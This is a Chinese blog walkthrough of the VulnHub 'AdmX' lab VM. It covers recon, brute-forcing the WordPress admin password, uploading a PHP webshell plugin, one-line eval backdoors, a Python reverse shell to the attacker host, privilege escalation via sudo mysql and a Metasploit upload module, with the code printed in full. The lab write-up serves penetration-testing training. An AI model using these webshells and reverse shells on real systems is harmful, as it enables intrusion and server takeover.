vulnhub靶场-AdmX

最新推荐文章于 2024-04-14 04:34:29 发布
最新推荐文章于 2024-04-14 04:34:29 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: 网络安全 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/125038073
版权

1、靶机信息

靶机名称:AdmX

靶机难度:中等

虚拟机环境:此靶机推荐使用Virtualbox搭建

目标:取得 2 个 flag + root 权限

靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z

kali服务器IP

192.168.2.172

靶机IP

192.168.2.171

2、主机发现

2.1 使用nmap进行主机发现,192.168.2.171就是我们的目标主机

nmap -sn 192.168.2.0/24

2.2 端口信息收集,目标靶机只开放了80端口

nmap -p- 192.168.2.171

2.3 对80端口进行服务版本扫描,可以看到是开放了Web服务

nmap -sV -p 80 192.168.2.171

3、Web信息收集

3.1 对Web页面进行查看,可以看到是一个apache的默认页面

3.2 按照常规步骤,进行路径发现,在爆破出来的路径中,可以看到有非常多的路径都是在wordpress这个目录下发现的,我们先对这个目录进行一个查看

feroxbuster --url http://192.168.2.171 -w /usr/share/dirb/wordlists/common.txt

3.3 访问http://192.168.2.171/wordpress,发现页面显示不正常

3.4 打开F12查看请求,发现请求失败的URL都指向了一个192.168.159.145的站点

3.5 为了让页面正常展示,我们使用burp的匹配和替换功能(Match And Replace),并将截断功能放开,重新访问http://192.168.2.171/wordpress页面即可

3.6 当我们在此页面进行各种尝试后,发现无可利用漏洞,重新看feroxbuster爆破出来的路径,发现一个后台登陆的站点http://192.168.2.171/wordpress/wp-admin/admin.php

3.7 通过尝试,发现对于系统不存在的用户名,会报错展示,基于此缺陷,我们发现站点存在admin账户

3.8 使用burp进行口令爆破,密码为adam14

3.9 使用admin/adam14成功登陆

4、上传webshell

4.1 在WordPress中常用的三种方式上传webshell,一种是通过Media-Add NEW接口,直接上传php的webshell即可,新版本中已经无法再使用这个方法上传。

4.2 第二种方法是通过appearance-Theme Editor,对php页面源码进行编辑,将一句话木马插入到主题中,在这里我们使用404主题文件进行插入,如果上传成功,可以直接访问404.php,拿到shell,结果是我们在点击 update file后,系统提示我们更改失败。

eval($_POST['ant']);

4.3 第三种方法是使用plugins功能,安装一个我们编写的webshell 插件。在这里我新建了一个webshell.php的文件,并且压缩成zip格式,上传至WordPress的plugins处进行安装,并点击activa plugin进行激活插件。

<?php
/**
 * Plugin Name: superwebshll
 * Plugin URI: https://webshell.com/ 
 * Description: This is webshell,thank u
 * Version: 1.0
 * Author: Automattic
 * Author URI: https://automattic.com/wordpress-plugins/
 * License: GPLv2 or later
 * Text Domain: akismet
 */
if(isset($_GET['cmd']))
 {  
        system($_GET['cmd']);
 }
?>

4.4 上传成功后,可以在plugins处看到

4.5 使用WordPress默认路径访问webshell,在这里我们可以看到命令被成功执行

http://192.168.2.171/wordpress/wp-content/plugins/webshell.php?cmd=id

5、反弹shell

5.1 首先在kali端监听端口

nc -nvlp 9999

5.2 查看目标服务器上是否存在python,发现是存在python3

webshell.php?cmd=which%20python3

5.3 使用python3进行反弹shell,反弹成功

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.172",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

6、交互式shell升级

6.1 通过反弹shell获得的shell功能有限,需要升级为Full TTY shell,kali默认shell为zsh,需要把zsh切换为Bash,查看目前shell类型为zsh

echo $SHELL

6.2 切换zsh为Bash

chsh -s /bin/bash

6.3 重新获取shell,重复第五部分,拿到shell后,输入ctrl+z 将获取到的shell放到后台

6.4 依次输入以下命令,获取交互式shell

stty raw -echo 
fg
export SHELL=/bin/bash 
export TERM=screen 
stty rows 38 columns 116 
reset

7、蚁剑上线

7.1 在appearance的index.php中插入一句话木马

路径为:vim /var/www/html/wordpress/wp-content/themes/twentytwentyone/index.php

eval($_POST['ant']);

7.2 在蚁剑中添加URL地址:http://192.168.2.171/wordpress/wp-content/themes/twentytwentyone/index.php,连接密码为ant,成功连接

8、提权

8.1 进入/home 目录下,发现还存在一个wpadmin的用户

8.2 在其用户目录下,存放一个local.txt的文档,并且只有wpadmin用户本身才具备读权限

8.3 搜集其他信息,目标是提权至wpadmin用户,查找WordPress的config文件,通过配置文件可以查看连接数据库的账密

DB_NAME:wordpress

DB_USER:admin

DB_PASSWORD:Wp_Admin#123

8.4 使用密码Wp_Admin#123尝试登陆至wpadmin用户,发现失败

su wpadmin

8.5 使用密码Wp_Admin#123尝试登陆mysql数据库,发现也失败了

mysql -u admin -p Wp_Admin#123 -D wordpress

8.6 尝试使用之前burp爆破出的WordPress后台密码进行登录,发现密码正确

8.7 读取前面的local.txt文件,拿到第一个flag

文件内容为:153495edec1b606c24947b1335998bd9

8.8 使用sudo -l 命令发现不需要密码既可以进入mysql数据库

8.9 使用adam14进入mysql数据库

sudo /usr/bin/mysql -u root -D wordpress -p

8.10 获取第二个flag

附:其他技巧-MSF获取shell

1. 除了上述的使用plugins功能获取shell,在这里再介绍另一种方式,使用MSF获取WordPress的shell方法。首先使用MSF搜索关键字wordpress admin

2. 在这里我们使用第二个模块,查看其参数

msf6 > use 2

msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

3. 设置MSF必要参数

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD adam14
PASSWORD => adam14
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.2.171
RHOSTS => 192.168.2.171
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RPORT 80
RPORT => 80
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

4. 输入shell命令,就可以执行相关操作,但发现使用MSF获取到的shell很多命令不能够正常执行,所以还是建议使用上述的通过plugins功能获取shell。

KALC
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
feroxbuster:用Rust编写的快速,简单,递归的内容发现工具
02-05
feroxbuster:用Rust编写的快速,简单,递归的内容发现工具
office-admx
02-14
office-admx
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 6866
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
【新手向】VulnHub靶场MONEYBOX 1 详细解析,通过五轮面试斩获offer阿里实习生亲述
最新发布
2401_83739503的博客
04-14 480
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 6816
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1471
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
vulnhub靶场-Nagini
qq_42947816的博客
11-01 1805
Nagini 是 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort
Office 2010-365 ADMX/ADML
08-05
适用于 Office 2010/2013/2016/2019/2021/365 的 ADMX/ADML 模板文件,用于部署组策略管理模板。参考文档: https://mp.csdn.net/mp_blog/creation/editor/126182767。
Firefox ADMX-开源
07-01
Firefox ADMX 是一种允许通过 Active Directory 中的组策略和管理模板在 Firefox 中集中管理锁定和/或默认设置的方法。 Firefox ADMX 是 Mark Sammons 的 Firefox ADM 的延续。
Windows ADMX/ADML
08-05
包括 Windows 8.1 及以上,Windows Server 2012 R2 及以上,所有 Windows 系统的 ADMX/ADML 模板文件,用于部署组策略管理模板。参考文档: https://mp.csdn.net/mp_blog/creation/editor/126182767。
EvergreenAdmx:使Admx文件保持最新状态的脚本
05-27
长荣Admx 部署了多个Windows Virtual Desktop环境后,我决定不再希望手动下载所需的Admx文件,而是想要一种使它们保持最新状态的方法。 该脚本解决了两个问题。 检查存在的Admx文件的较新版本,并在找到新版本时进行...
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2367
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5593
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3361
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
Vulhub靶场搭建
qq_52666132的博客
06-26 3795
Vulhub靶场搭建
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1260
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
VulnHub渗透测试实战靶场 - CHILI:1
LYJ20010728的博客
08-20 1056
VulnHub渗透测试实战靶场 - CHILI:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.138 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 2863
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
Vulhub漏洞靶场搭建
Innocence_0的博客
09-20 639
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
apphvsi.admx
09-01
apphvsi.admx是一种用于管理应用虚拟化的Windows组策略模板文件。组策略是Windows操作系统中的一种集中管理和配置计算机和用户设置的工具。使用apphvsi.admx文件,管理员可以在组策略中定义和配置应用虚拟化相关的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值